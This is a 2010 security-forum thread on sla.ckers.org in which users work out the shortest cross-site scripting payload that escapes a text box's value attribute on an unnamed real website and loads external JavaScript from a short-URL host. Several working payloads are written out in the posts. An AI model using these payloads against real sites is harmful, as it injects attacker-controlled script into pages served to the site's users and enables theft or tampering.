Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Short Script Block?
Posted by: nephijohnson
Date: January 12, 2010 12:29PM

I recently came across an XSS hole in a website I use frequently. I'm able to inject my own html into the page, but it's limited by the server to 30 characters.
This has turned into more of an academic challenge for me to try and insert something that will load an external javascript file.

The injection takes place in the value attribute of a text box, so it looks like this:

<input type="text" value="INSERT-HERE" />

Part of the 30 characters I am able to insert are needed to break out of the value attribute.

I've (with a little help) gotten it down to 34 characters:

"><script src=//ix.lt/##></script>

and in certain situations (explained in my blog here: http://gnarlysec.blogspot.com/2010/01/xss-and-ultra-short-urls.html) down to 27 characters:

"><script src=//ix.lt/##>/*

I've thought of trying to locate other script tags in the page through the DOM and changing the src attribute, but those all ended up too long.

Can anyone come up with something shorter? You can assume the domain for the external js file is five characters and the path is two characters.

Options: ReplyQuote
Re: Short Script Block?
Posted by: Gareth Heyes
Date: January 12, 2010 02:01PM

Job done.


"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Short Script Block?
Posted by: nephijohnson
Date: January 12, 2010 03:29PM

I'm not sure what you mean with the eval(name) part, but I did come up with a solution:

In browsers that use WebKit (I tested it with Chrome and Safari), you're able to use

<script src="..." />

This made a total count of 30 characters, meeting the max character count:

"><script src=http:ix.lt/## />

Also, in my specific situation, the original page was https, so using // instead of http: couldn't be used, since //ix.lt/## would load https://ix.lt/##, which ix.lt doesn't support.

Also, I had said that in certain situations you could only put the head tag of the script block followed by a multi-line javascript comment. I found that the multi-line comment is unnecessary (I elaborate more on my blog).

Options: ReplyQuote
Re: Short Script Block?
Posted by: nephijohnson
Date: January 13, 2010 01:38PM

I get the eval(name) part now :) Thanks for the tip Gareth

Options: ReplyQuote

Sorry, only registered users may post in this forum.